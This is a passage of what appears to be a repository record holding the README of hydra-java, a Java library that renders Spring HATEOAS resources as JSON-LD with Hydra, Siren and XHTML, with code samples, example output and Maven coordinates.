https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-jsonld\/src\/test\/java\/de\/escalon\/hypermedia\/hydra\/serialize\/JacksonHydraSerializerTest.java[JacksonHydraSerializerTest] demonstrate the usage of `@Vocab`, `@Expose` and `@Term`.\n\n== Features of hydra-spring\nThe conversion of a spring-hateoas Resource to hydra does the following:\n\n- renders a spring-hateoas `List<Link>` in a `Resource<T>` in json-ld style\n- renders spring-hateoas `Resources<T>` as `hydra:Collection`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders spring-hateoas `PagedResources<T>` as `hydra:Collection` with a `hydra:PartialCollectionView`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders responses with `\"@vocab\" : \"http:\/\/schema.org\/\"` by default; a different `@vocab` can be defined on a class or package using the `@Vocab` annotation.\n- supports vocabularies in addition to the default vocabulary via terms in the `@context`. 
Use `@Term` in conjunction with `@Terms` on a class or package for this.\n- renders `@type` based on the Java class name by default, a vocabulary class can be produced instead using `@Expose` on the Java class.\n- renders attributes assuming that the attribute name is a property in the default vocab defined by `@vocab`. In other words, it renders an `offers` member as `\"offers\"` on a json-ld object with a context defining `\"@vocab\" : \"http:\/\/schema.org\"`, so that you end up with `\"http:\/\/schema.org\/offers\"` as linked data name for your `offers` member. To map a custom attribute name such as `foo` to an existing property in the default vocab or other vocabs use `@Expose` on the attribute and a term will be created in `@context` which maps your attribute to the vocab property you set as value of `@Expose`.\n- renders Java enums assuming that an enum value name is an enumerated value defined by the default vocab. In json-ld it is not only possible to have attribute names, but also attribute *values* that have linked data names. The idiom to express that is `\"@type\" : \"@vocab\"`. An example of this is http:\/\/schema.org\/OnSitePickup[OnSitePickup], which is an enum value for the property http:\/\/schema.org\/availableDeliveryMethod[availableDeliveryMethod]. If your Java enum value is ON_SITE_PICKUP, it matches the vocab value of OnSitePickup. It will be rendered as ON_SITE_PICKUP and hydra-java will add the necessary definition to the context which makes it clear that ON_SITE_PICKUP is actually `http:\/\/schema.org\/OnSitePickup`. If your Java enum value has a different name than the vocab value, use `@Expose` on the enum value to get a correct representation in the context. Note that you can also expose an enum value from a different vocabulary such as GoodRelations, see below.\n\nAs of version 0.2.0 hydra-java supports hydra:collection, hydra:operation and hydra:IriTemplate as well as reversed terms. To make this possible, you *must* use the `linkTo` and `methodOn` methods of AffordanceBuilder as a drop-in replacement for `ControllerLinkBuilder`. Templated links created by ControllerLinkBuilder will at least be rendered as IriTemplates, but only with limited information about the template variables.\n\nFurthermore, if you use these hydra features, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n\n* renders a link to a remote collection as https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[hydra:collection]. If you define the affordance to the remote collection with `AffordanceBuilder.rel()`, the remote collection gets a `hydra:subject` in its manages block, whereas if you define it with `reverseRel()` you get a `hydra:object`. To learn more about this design, consider the article https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[Collection Design] in the hydra-cg wiki.\n* renders a templated link as `hydra:IriTemplate`. Method parameters can be annotated with `@Expose` to assign them a property URI, otherwise the variable name will be shown as a term in the current vocab. If you create a link with AffordanceBuilder's linkTo-method facilities and you pass `null` for arguments annotated with `@PathVariable` or `@RequestParam`, it will automatically become a templated link with variables for the `null` arguments.\n* renders a link to method handlers for any *combination* of GET, POST, PUT, PATCH and DELETE as `hydra:operation`. 
In order to express that multiple HTTP methods can be invoked on the same resource, use the `and()` method of AffordanceBuilder. See below for an example.\n* renders a single, manually created, non-templated Link or Affordance in json-ld style.\n* renders a POJO method parameter annotated with `@RequestBody` as expected rdfs:subClassOf. Use `@Expose` on the POJO class for a custom identifier. The setter methods on the bean appear as `hydra:supportedProperty`, and you can annotate them with `@Expose` to give them a semantic identifier. Again see below for an example.\n* uses certain schema.org facilities to describe expected request bodies. For this we need schema.org either as `@vocab` or as a `schema:` term. If you do not use schema.org as `@vocab`, make sure you have a `@Term(define = \"schema\", as = \"http:\/\/schema.org\/\")` in the context.\n** expresses default value and value constraints by means of http:\/\/schema.org\/PropertyValueSpecification. To specify such constraints, use the `@Input` annotation. Available constraints are min, max, step, minLength, maxLength and pattern.\n** expresses supported properties whose value is an object by nesting them via http:\/\/schema.org\/rangeIncludes.\n\n\n== Examples\n\n=== Designing a Hydra API ===\nSee my article https:\/\/www.w3.org\/community\/hydra\/wiki\/Restbucks_with_Hydra for an example of an ordering flow. There is also a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/store[Sample Shop] which demonstrates the ideas from the article.\n\n=== Live Demo\n\nUse a ReST client to access a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/events[Sample Events API] to see the artifact hydra-sample at work. OpenShift sometimes completely shuts down the container; please try several times if you run into server errors when first accessing the sample.\n\nBrowsers will show the html representation of the API by default, which uses the `XhtmlResourceMessageConverter`. Sending `Accept: application\/ld+json` will get you hydra, but `application\/json` or `application\/hal+json` work as well. \nWhen you POST or PUT, make sure you add a Content-Type header matching your request.\n\n\n=== Exposing Java Bean Attributes\n\nThe example shows a Java enum named `BusinessFunction` whose enum values are exposed as values from GoodRelations. The enum appears on an `Offer` object with a GoodRelations term:\n\n[source, Java]\n----\n enum BusinessFunction {\n @Expose(\"gr:LeaseOut\")\n RENT,\n @Expose(\"gr:Sell\")\n FOR_SALE,\n @Expose(\"gr:Buy\")\n BUY\n }\n\n @Term(define = \"gr\", as = \"http:\/\/purl.org\/goodrelations\/v1#\")\n class Offer {\n public BusinessFunction businessFunction;\n ...\n }\n----\n\nThe json-ld output written by hydra-java makes the GoodRelations URL known under the shorthand `gr`, says that the `businessFunction` property contains values defined by a vocabulary and maps the Java enum value `RENT` to its linked data name `\"gr:LeaseOut\"`.\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"gr\": \"http:\/\/purl.org\/goodrelations\/v1#\",\n \"businessFunction\": {\"@type\": \"@vocab\"},\n \"RENT\": \"gr:LeaseOut\"\n },\n \"@type\": \"Offer\",\n \"businessFunction\": \"RENT\"\n}\n----\n\n=== AffordanceBuilder for rich hyperlinks\n\nA hypermedia affordance is a rich hyperlink. 
That means, it not only contains a URI or a URITemplate, but also information about the usage of the URI, such as supported http methods and expected parameters. The term 'hypermedia affordance' is a neologism made popular by http:\/\/amundsen.com\/blog\/archives\/1109[Mike Amundsen], following an earlier reference in http:\/\/roy.gbiv.com\/talks\/200804_REST_ApacheCon.pdf[A little REST and Relaxation] by Roy Fielding.\nA hydra-java `Affordance` can be used to render media-types which support this kind of information: first and foremost hydra, but it is quite easy to add message converters for other media types once the basic information is available.\n\nVersion 0.2.0 provides an `AffordanceBuilder` class which is a drop-in replacement for the spring-hateoas `ControllerLinkBuilder`.\n\nThe `AffordanceBuilder` does _not depend on hydra or json-ld_. It lives in the standalone jar spring-hateoas-ext and can also be used to render other media types than json-ld. It has support for all HAL link attributes when rendered as HAL, and can also be\nrendered as Siren or XHtml using message converters from spring-hateoas-ext.\n\nSee <<Maven Support>> for the maven coordinates of spring-hateoas-ext.\n\nUse the `AffordanceBuilder` to build `Affordance` instances which inherit from the spring-hateoas `Link` but add the following traits to it:\n\n* Full support for all attributes of a http Link header as described by the https:\/\/tools.ietf.org\/html\/rfc5988[web linking rfc 5988]\n* Support for templated link headers as described by the http:\/\/tools.ietf.org\/html\/draft-nottingham-link-template-01[Link-Template Header Internet draft]\n* Improved creation of link templates. You can use the `linkTo-methodOn` technique to create templated links to handler methods. By simply leaving a parameter undefined (`null`) in a `methodOn` sample call, a template variable will be applied to your link.\n* Facility to chain several method invocations on the same resource. If the same link is used to PUT and DELETE a resource, use `AffordanceBuilder.and()` to add both method handlers to the affordance.\n* Has action descriptors with information about http methods and expected request data. Based on reflection and a minimal set of annotations it is possible to render forms-like affordances with quite precise information about expected input.\n\nIn the following we use `AffordanceBuilder` to add a `self` rel that can be used with GET, PUT and DELETE to an event bean.\nFirst we wrap the event into a `Resource` so we can add affordances to it. 
Then we use the `linkTo-methodOn` technique three times to describe that the self rel can be used to get, update and delete the event.\n\n[source, Java]\n----\n\n import static de.escalon.hypermedia.spring.AffordanceBuilder.linkTo;\n import static de.escalon.hypermedia.spring.AffordanceBuilder.methodOn;\n\n @Controller\n @RequestMapping(\"\/events\")\n public class EventController {\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n \/\/ get the event from some backend, then:\n Resource<Event> eventResource = new Resource<Event>(event);\n\n \/\/ using AffordanceBuilder.linkTo and AffordanceBuilder.methodOn\n \/\/ instead of ControllerLinkBuilder methods\n eventResource.add(linkTo(methodOn(EventController.class)\n .getEvent(event.id))\n .and(linkTo(methodOn(EventController.class) \/\/ 2nd action with .and\n .updateEvent(event.id, event)))\n .and(linkTo(methodOn(EventController.class) \/\/ 3rd action with .and\n .deleteEvent(event.id)))\n .withSelfRel());\n return eventResource;\n }\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n ...\n }\n\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.PUT)\n public ResponseEntity<Void> updateEvent(@PathVariable int eventId, @RequestBody Event event) {\n ...\n }\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.DELETE)\n public ResponseEntity<Void> deleteEvent(@PathVariable int eventId) {\n ...\n }\n }\n\n public class Event {\n public final int id;\n public final String performer;\n public final String location;\n private EventStatusType eventStatus;\n private String name;\n\n public Event(int id, String performer, String name, String location, EventStatusType eventStatus) {\n ...\n }\n\n public void setEventStatus(EventStatusType eventStatus) {\n this.eventStatus = eventStatus;\n }\n }\n\n----\n\nWhen rendered with the `HydraMessageConverter`, the resulting json-ld event object has the corresponding GET, PUT and DELETE operations. The PUT operation expects an http:\/\/schema.org\/Event[Event] with a property http:\/\/schema.org\/eventStatus[eventStatus]. By default, writable properties (with a setter following the JavaBean conventions) are rendered as `hydra:supportedProperty`. The URI to be used by the operations is the `@id` of the object that has a `hydra:operation`.\n\n[source, Javascript]\n----\n {\n \"@type\": \"Event\",\n \"@id\": \"http:\/\/localhost\/events\/1\",\n \"performer\": \"Walk off the Earth\",\n \"location\": \"Wiesbaden\",\n \"name\": \"Gang of Rhythm Tour\",\n \"eventStatus\" : \"EVENT_SCHEDULED\",\n \"hydra:operation\": [\n {\n \"hydra:method\": \"GET\"\n },\n {\n \"hydra:method\": \"PUT\",\n \"hydra:expects\":\n {\n \"@type\": \"Event\",\n \"hydra:supportedProperty\": [\n {\n \"hydra:property\": \"eventStatus\",\n \"hydra:required\": \"true\",\n \"readonlyValue\": false\n },\n {\n \"hydra:property\": \"location\",\n \"defaultValue\": \"Wiesbaden\",\n \"readonlyValue\": false\n },\n ... other properties required for a replacing PUT\n ]\n }\n },\n {\n \"hydra:method\": \"DELETE\"\n }\n ]\n }\n----\n\n\n=== Specifying Property Value Requirements (from V. 0.2.0)\n\nNow let us tell the client a range of possible values for a property. We want to allow clients to add reviews for the work performed at an event. 
For this, we add a `Resource<CreativeWork>` to the `Event`, so that we can define an affordance on the creative work which allows clients to send reviews.\n\n[source, Java]\n----\n public class Event {\n ...\n private final Resource<CreativeWork> workPerformed;\n\n public Resource<CreativeWork> getWorkPerformed() {\n return workPerformed;\n }\n ...\n }\n\n \/\/ in EventController:\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n\n \/\/ with an event from backend do this:\n\n event.getWorkPerformed() \/\/ <-- must be a Resource<CreativeWork>\n .add(linkTo(methodOn(ReviewController.class) \/\/ <-- must use AffordanceBuilder.linkTo here\n .addReview(event.id, new Review(null, new Rating(3)))) \/\/ <-- default ratingValue 3\n .withRel(\"review\"));\n ...\n }\n\n @Controller\n @RequestMapping(\"\/reviews\")\n public class ReviewController {\n\n @RequestMapping(value = \"\/events\/{eventId}\", method = RequestMethod.POST)\n public ResponseEntity<Void> addReview(@PathVariable int eventId, @RequestBody Review review) {\n \/\/ add review and return 201 Created\n }\n }\n----\n\nWe expect that clients post a Review with a review body and a rating. The review body and the rating value have input constraints, so we annotate the method `setReviewBody` with `@Input(pattern=\".{10,}\")` and `setRatingValue` with `@Input(min = 1, max = 5, step = 1)`, as shown below.\n\n[source, Java]\n----\n\n public class Rating {\n private Integer ratingValue;\n\n @JsonCreator\n public Rating(@JsonProperty(\"ratingValue\") Integer ratingValue) {\n ...\n }\n\n\n public void setRatingValue(@Input(min = 1, max = 5, step = 1) Integer ratingValue) {\n this.ratingValue = ratingValue;\n }\n }\n\n\n public class Review {\n\n private String reviewBody;\n private Rating reviewRating;\n\n @JsonCreator\n public Review(@JsonProperty(\"reviewBody\") String reviewBody,\n @JsonProperty(\"reviewRating\") Rating reviewRating) {\n ...\n }\n\n public void setReviewBody(@Input(pattern=\".{10,}\") String reviewBody) {\n ...\n }\n\n public void setReviewRating(Rating rating) {\n this.reviewRating = rating;\n }\n }\n\n----\n\nIn the resulting json-ld we use schema.org's http:\/\/schema.org\/PropertyValueSpecification[PropertyValueSpecification] to express the input constraints `minValue`, `maxValue`, `stepValue` and `valuePattern`, as well as `defaultValue` containing the rating value `3` that was passed to the sample method invocation with `methodOn`. Note that the creative work has a `review` attribute now, although the `CreativeWork` pojo has no such property. It appears because we added a rel `review` to the workPerformed resource.\n\nRight now it is not possible to specify a list of expected values, either with hydra or with `schema:PropertyValueSpecification`. 
If you are interested in that, look into https:\/\/github.com\/HydraCG\/Specifications\/issues\/82[#82 Add support for allowed literals and allowed individuals] and participate in the discussion in the http:\/\/lists.w3.org\/Archives\/Public\/public-hydra\/2015Jan\/0019.html[Hydra-CG mailing list].\n\n[source, Javascript]\n----\n{\n \"@context\":\n {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"hydra\": \"http:\/\/www.w3.org\/ns\/hydra\/core#\",\n \"eventStatus\":\n {\n \"@type\": \"@vocab\"\n },\n \"EVENT_SCHEDULED\": \"EventScheduled\"\n },\n \"@type\": \"Event\",\n \"performer\": \"Walk off the Earth\",\n \"location\": \"Wiesbaden\",\n \"eventStatus\": \"EVENT_SCHEDULED\",\n \"workPerformed\": {\n \"@type\": \"CreativeWork\",\n \"name\": \"Gang of Rhythm Tour\",\n \"review\": {\n \"@id\": \"http:\/\/localhost:8210\/webapp\/hypermedia-api\/reviews\/events\/1\",\n \"hydra:operation\": [\n {\n \"@type\": \"ReviewAction\",\n \"hydra:method\": \"POST\",\n \"hydra:expects\": {\n \"@type\": \"Review\",\n \"hydra:supportedProperty\": [\n {\n \"@type\": \"PropertyValueSpecification\",\n \"hydra:property\": \"reviewBody\",\n \"valuePattern\": \".{10,}\"\n },\n {\n \"hydra:property\": \"reviewRating\",\n \"rangeIncludes\": {\n \"@type\": \"Rating\",\n \"hydra:supportedProperty\": [\n {\n \"@type\": \"PropertyValueSpecification\",\n \"hydra:property\": \"ratingValue\",\n \"defaultValue\": 3,\n \"maxValue\": 5,\n \"minValue\": 1,\n \"stepValue\": 1\n }\n ]\n }\n }\n ]\n }\n }\n ]\n }\n }\n}\n\n----\n\nIf an expected property on a request object holds a nested json object in turn, hydra-java will render it following a proposal from https:\/\/github.com\/HydraCG\/Specifications\/issues\/26[Hydra-CG Issue 26] using http:\/\/schema.org\/rangeIncludes[schema:rangeIncludes]. The fact that this issue is not resolved yet is the main reason why hydra-java 0.2.0 is an alpha release. So be especially wary that changes are likely for the way hydra-java prescribes nested properties.\n\n\n=== Rendering other media types (from V. 0.2.0-alpha8)\n\nClients should be able to request a media-type they understand by means of content negotiation. Following this principle, the spring-hateoas-ext package provides the foundation to render hypermedia types which describe expected requests - not only as json-ld, but also as other media types. 
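For example, a client can select the representation it understands purely via the `Accept` header. A minimal sketch using Spring's `RestTemplate` (the URL is illustrative):\n\n[source, Java]\n----\n\n import java.util.Collections;\n import org.springframework.http.*;\n import org.springframework.web.client.RestTemplate;\n\n RestTemplate restTemplate = new RestTemplate();\n HttpHeaders headers = new HttpHeaders();\n \/\/ ask for Siren here; use \"application\/ld+json\" to get hydra instead\n headers.setAccept(Collections.singletonList(\n MediaType.parseMediaType(\"application\/vnd.siren+json\")));\n ResponseEntity<String> response = restTemplate.exchange(\n \"http:\/\/localhost:8080\/hypermedia-api\/events\/1\",\n HttpMethod.GET, new HttpEntity<Void>(headers), String.class);\n\n----\n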
\n\n==== XhtmlResourceMessageConverter\n\nThe `XhtmlResourceMessageConverter` is the second message converter in hydra-java which makes use of affordances built by `AffordanceBuilder`.\n\nIf you add a `JsonLdDocumentationProvider` to the converter, it will render bean attributes as hyperlinks which point to their documentation on schema.org or other vocabularies, provided that your java beans are annotated with the necessary information.\n\nThe xhtml response renders bootstrap-conforming markup; you can add the bootstrap css as shown below, or your own stylesheets.\n\n[source, Java]\n----\n\n@Configuration\n@EnableWebMvc\npublic class Config extends WebMvcConfigurerAdapter {\n ...\n @Override\n public void configureMessageConverters(List<HttpMessageConverter<?>> converters) {\n converters.add(halConverter());\n converters.add(xhtmlMessageConverter());\n converters.add(jsonConverter());\n }\n\n private HttpMessageConverter<?> xhtmlMessageConverter() {\n XhtmlResourceMessageConverter xhtmlResourceMessageConverter = new XhtmlResourceMessageConverter();\n xhtmlResourceMessageConverter.setStylesheets(\n Arrays.asList(\n \"https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.4\/css\/bootstrap.min.css\"\n ));\n xhtmlResourceMessageConverter.setDocumentationProvider(new JsonLdDocumentationProvider());\n return xhtmlResourceMessageConverter;\n }\n ...\n}\n\n----\n\nTo make the API browsable, PUT and DELETE are tunneled through POST. This is necessary because the HTML media type does not support PUT or DELETE: a browser can only submit forms that use GET or POST. Spring-MVC has a servlet filter which makes tunneling easy. The web.xml of the hydra-sample service shows how to enable that filter:\n\n[source, XML]\n----\n <filter>\n <filter-name>HiddenHttpMethodFilter<\/filter-name>\n <filter-class>org.springframework.web.filter.HiddenHttpMethodFilter<\/filter-class>\n <\/filter>\n <filter-mapping>\n <filter-name>HiddenHttpMethodFilter<\/filter-name>\n <servlet-name>hypermedia-api<\/servlet-name>\n <\/filter-mapping>\n----\n\n\n==== SirenMessageConverter (from V. 0.2.0-beta5)\nThe `SirenMessageConverter` renders Spring Hateoas Responses as https:\/\/github.com\/kevinswiber\/siren[Siren] messages, using the media type `application\/vnd.siren+json`.\n\n* maps a plain Spring Hateoas `Link` to an embedded link or navigational link.\n* a templated link becomes a Siren GET action with named siren fields for the template query variables\n* in order to produce more expressive Siren actions, use the `linkTo-methodOn` idiom of `AffordanceBuilder` to point to your methods, as shown above for the sample `EventController` in the section AffordanceBuilder.\n* possible values found by `AffordanceBuilder` are treated as checkbox or radio button fields, following the technique discussed in the https:\/\/groups.google.com\/forum\/#!topic\/siren-hypermedia\/8mbOX44gguU[Siren group].\n* field types can be defined via the value of the `@Input` annotation on method parameters (e.g. `@Input(Type.DATE)`).\n* nested `Resource` objects are shown as embedded representations\n* distinguishes navigational and embedded links by a default list of navigational rels. This list can be customized via `SirenMessageConverter.addNavigationalRels`.\n* for sub-entities the property name is used as relation name. The Siren class name is derived from the Java class name. The rel names can be customized using a `DocumentationProvider` implementation, e.g. 
the `JsonLdDocumentationProvider` from hydra-jsonld will make use of `@Expose` and `@Vocab` annotations on your response bean packages.\n* relies on `XhtmlMessageConverter` to process incoming form-urlencoded requests and on `MappingJackson2HttpMessageConverter` for json requests.\n\nThe Siren output for the sample `EventController` above is shown below. Note that the `JsonLdDocumentationProvider` has created the link relation type `http:\/\/schema.org\/workPerformed`. One could also use the `UrlPrefixDocumentationProvider` for simple URL prefixing.\n\n[source, Javascript]\n----\n{\n \"class\": [\n \"event\"\n ],\n \"properties\": {\n \"performer\": \"Walk off the Earth\",\n \"eventStatus\": \"EVENT_SCHEDULED\",\n \"location\": \"Wiesbaden\"\n },\n \"entities\": [\n {\n \"class\": [\n \"creativeWork\"\n ],\n \"rel\": [\n \"http:\/\/schema.org\/workPerformed\"\n ],\n \"properties\": {\n \"name\": \"Gang of Rhythm Tour\"\n },\n \"actions\": [\n {\n \"name\": \"addReview\",\n \"method\": \"POST\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/reviews\/events\/1\",\n \"fields\": [\n {\n \"name\": \"reviewBody\",\n \"type\": \"text\"\n },\n {\n \"name\": \"reviewRating.ratingValue\",\n \"type\": \"number\",\n \"value\": \"3\"\n }\n ]\n }\n ]\n }\n ],\n \"actions\": [\n {\n \"name\": \"updateEvent\",\n \"method\": \"PUT\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\",\n \"fields\": [\n {\n \"name\": \"location\",\n \"type\": \"text\",\n \"value\": \"Wiesbaden\"\n },\n {\n \"name\": \"eventStatus\",\n \"type\": \"radio\",\n \"value\": [\n {\n \"value\": \"EVENT_CANCELLED\"\n },\n {\n \"value\": \"EVENT_POSTPONED\"\n },\n {\n \"value\": \"EVENT_SCHEDULED\",\n \"selected\": true\n },\n {\n \"value\": \"EVENT_RESCHEDULED\"\n }\n ]\n }\n ... other properties required for a replacing PUT\n ]\n },\n {\n \"name\": \"deleteEvent\",\n \"method\": \"DELETE\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\"\n }\n ],\n \"links\": [\n {\n \"rel\": [\n \"self\"\n ],\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\"\n }\n ]\n}\n----\n
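\nBy analogy with the XHTML converter configuration shown above, the `SirenMessageConverter` is registered as just another message converter. A sketch only (the no-arg constructor is an assumption and \"search\" is an illustrative rel; see the sample configuration linked under First Steps for the authoritative setup):\n\n[source, Java]\n----\n\n private HttpMessageConverter<?> sirenMessageConverter() {\n SirenMessageConverter sirenMessageConverter = new SirenMessageConverter();\n \/\/ addNavigationalRels is described above; it marks rels to render as\n \/\/ navigational links rather than embedded entities\n sirenMessageConverter.addNavigationalRels(\"search\");\n return sirenMessageConverter;\n }\n\n----\n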
\n\n== Maven Support\nThe latest Maven releases of hydra-java are in Maven central. These are the maven coordinates for hydra-spring.\n\n[source, XML]\n----\n<dependency>\n <groupId>de.escalon.hypermedia<\/groupId>\n <artifactId>hydra-spring<\/artifactId>\n <version>0.3.0<\/version>\n<\/dependency>\n----\n\nIf you only want to use `AffordanceBuilder` or the `XhtmlResourceMessageConverter` and `SirenMessageConverter` without the json-ld dependencies, use spring-hateoas-ext alone:\n\n[source, XML]\n----\n<dependency>\n <groupId>de.escalon.hypermedia<\/groupId>\n <artifactId>spring-hateoas-ext<\/artifactId>\n <version>0.3.0<\/version>\n<\/dependency>\n----\n\n== Vocabularies\nWhat if schema.org is not sufficient? On\nhttp:\/\/lov.okfn.org\/dataset\/lov\/[Linked Open Vocabularies] you can search for terms in other vocabularies. Another option is to http:\/\/www.w3.org\/wiki\/WebSchemas\/SchemaDotOrgProposals[propose an addition to schema.org].\n\nIf you are unsure which vocab to use, ask on the http:\/\/lists.w3.org\/Archives\/Public\/public-hydra\/[hydra mailing list].\n\n== What's new\n=== 0.3.0\n\n- extraction of ActionDescriptor and ActionInputParameter interfaces, coordinating with http:\/\/www.hdiv.org\/[HDIV] to get forms into spring-hateoas\n- optimization of json-ld output: do not repeat terms which are in the parent context already\n- simple feature to use query parameters mapped to a parameter bean or a parameter Map annotated with @Input rather than single RequestParam arguments. Right now, it can only be used to build a UriTemplate; no description for the template variables is available yet. Use `@Input(include=..., exclude=...)` to filter applicable bean properties or describe expected Map values. The UriTemplate for such an affordance is available via `Affordance.getUriTemplateComponents().toString()`, but not via `Affordance.toString()`, to keep an Affordance created via AffordanceBuilder compatible with a Link created by ControllerLinkBuilder.\n- Affordance now has a `type` property and unwraps extension link params when rendered as JSON, which e.g. allows you to use link attributes of HAL (type, name, deprecation etc.) which are not present in the basic `Link` class\n\n== Acknowledgements\n\nI would like to thank Mike Amundsen, Stu Charlton, Jon Moore, J\u00f8rn Wildt, Mike Kelly, Markus Lanthaler, Gregg Kellogg and Manu Sporny for their inspiration and for valuable comments along the way. Also thanks to Oliver Gierke, who has been accepting some of my pull requests to spring-hateoas.\n","old_contents":"= hydra-java image:https:\/\/travis-ci.org\/dschulten\/hydra-java.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/dschulten\/hydra-java\"]\n:toc:\n:toc-placement: preamble\n\nAnnotate your Java beans and serialize them as http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] with http:\/\/www.hydra-cg.com\/spec\/latest\/core\/[hydra].\n\nStatus: Testing. Since the Hydra Specification is still a draft, expect incompatible changes.\n\nLatest release: 0.3.0-beta6\n\n== Problem\n\nThe meaning of json attributes in api responses, their possible values etc. is usually not obvious without referring to some \ninformation coming from outside the resource itself. That is due to the nature of json. Two solutions immediately come to mind. Both are ways of vendor-specific documentation, some are machine-readable, some aren't. \n\nDescribe the type in some sort of json-schema, wadl, raml, swagger or similar and publish it together with the resource. People could even generate classes from this information, if they wish to. My api users coming from a wsdl background scream for something like that. \n\nOr put up documentation pages to describe your ex:doodad extension relation types and make the documentation available by dereferencing http:\/\/example.com\/api\/rels#doodad.\n\nBut one of the rules for a ReSTful API is:\n\n[quote, Roy Fielding]\n____\nA REST API should never have \u201ctyped\u201d resources that are significant to the client. \nSpecification authors may use resource types for describing server implementation behind the interface, \nbut those types must be irrelevant and invisible to the client. \nThe only types that are significant to a client are the current representation\u2019s media type and standardized relation names. 
\n[Failure here implies that clients are assuming a resource structure due to out-of-band information, \nsuch as a domain-specific standard, which is the data-oriented equivalent to RPC's functional coupling].\n____\n\nMy interpretation of this famous http:\/\/roy.gbiv.com\/untangled\/2008\/rest-apis-must-be-hypertext-driven[rant by Roy Fielding]:\n\nA publicly available media-type should give clients all necessary means to interpret a server response, \nand relation names for hyperlinks in the response must be recognizable based on public conventions, so that the client can act upon\nthe responses it receives without knowing the details of a vendor-specific api.\n\nIn other words: If a client is told to make a reservation for a concert ticket, it should be able to recognize what \none-fancy-api requires to achieve that without processing vendor-specific documentation. How can we do that, purely based on a media type and relation names? Do we need hundreds of iana-registered media types for all kinds of purposes?\n\n== Solution (evolving)\n\nI see http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] (media type application\/ld+json) as a possible way to solve this problem without forcing people to ask me\nabout my vendor-specific documentation, thus decoupling the clients from my server types.\n\nClients should be able to understand a response based on widely available, standardized, public information.\n\nThe json-ld media type allows you to bring descriptions of things in the real world from public vocabularies into your json files. With json-ld there *is* a way to say that a json response describes a http:\/\/schema.org\/MusicEvent[MusicEvent] which http:\/\/schema.org\/offers[offers] a http:\/\/schema.org\/Ticket[Ticket] without any vendor-specific documentation, and it can also link to other resources.\n\nA popular vocabulary which describes things on the internet is http:\/\/schema.org. It is used by all major search engines for search engine optimization and is sufficient for basic needs. It also integrates with other vocabularies, \ne.g. by using http:\/\/schema.org\/additionalType[additionalType] to point to http:\/\/purl.org\/goodrelations\/[GoodRelations] classes or by using external enumerated values as shown by http:\/\/schema.org\/DeliveryMethod[DeliveryMethod].\n\n(For those of you about to say that the Semantic Web never took off, please note that json-ld is http:\/\/manu.sporny.org\/2014\/json-ld-origins-2\/[not about the Semantic Web at all]).\n\nhttp:\/\/www.hydra-cg.com\/[Hydra] adds interaction to the mix. 
It describes exactly how to post a ticket reservation.\n\nSo I want to add json-ld information to json objects serialized from my Java beans.\n\nJava beans have no knowledge about the meaning of their bean properties and they do not know what they represent in the real world.\n\nIn the simplest possible case I want to design my json objects so that they can be understood by others based on schema.org.\nBy simply calling my json transfer class `Person` and letting it have an attribute `name`, I want to get a publicly understandable\njson object, like this:\n\n[source, Java]\n----\n @Test\n public void testDefaultVocabIsRendered() throws Exception {\n\n class Person {\n private String name = \"Dietrich Schulten\";\n\n public String getName() {\n return name;\n }\n }\n\n mapper.writeValue(w, new Person());\n }\n----\n\nThe corresponding json-ld object, written by hydra-java:\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\"\n },\n \"@type\": \"Person\",\n \"name\": \"Dietrich Schulten\"\n}\n----\n\nNote that I do not bind my clients to a server type `Person`. \nRather, client and server are talking about the thing http:\/\/schema.org\/Person[Person] as it is known and recognized by all major search engines.\n\nFor a more expressive example consider the json-ld example of http:\/\/schema.org\/MusicEvent[MusicEvent], which shows what a ticket offering could look like.\n\nIn a more complex scenario I want to use my own attribute names and object design and still be able to use schema.org or other vocabs to describe their meaning. In json-ld I can. See below for a listing of vocabularies.\n\n== First Steps\nIt is currently possible to render responses from a https:\/\/github.com\/spring-projects\/spring-hateoas[spring-hateoas] service based on Spring MVC with various message converters.\n\nLook into the https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-sample\/service\/src\/main\/java\/de\/escalon\/hypermedia\/sample\/Config.java[sample configuration] to see how you can set up the hydra message converter, but also the XHTML message converter and the Siren message converter with Spring MVC.\nThe tests in https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-jsonld\/src\/test\/java\/de\/escalon\/hypermedia\/hydra\/serialize\/JacksonHydraSerializerTest.java[JacksonHydraSerializerTest] demonstrate the usage of `@Vocab`, `@Expose` and `@Term`.\n\n== Features of hydra-spring\nThe conversion of a spring-hateoas Resource to hydra does the following:\n\n- renders a spring-hateoas `List<Link>` in a `Resource<T>` in json-ld style\n- renders spring-hateoas `Resources<T>` as `hydra:Collection`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = 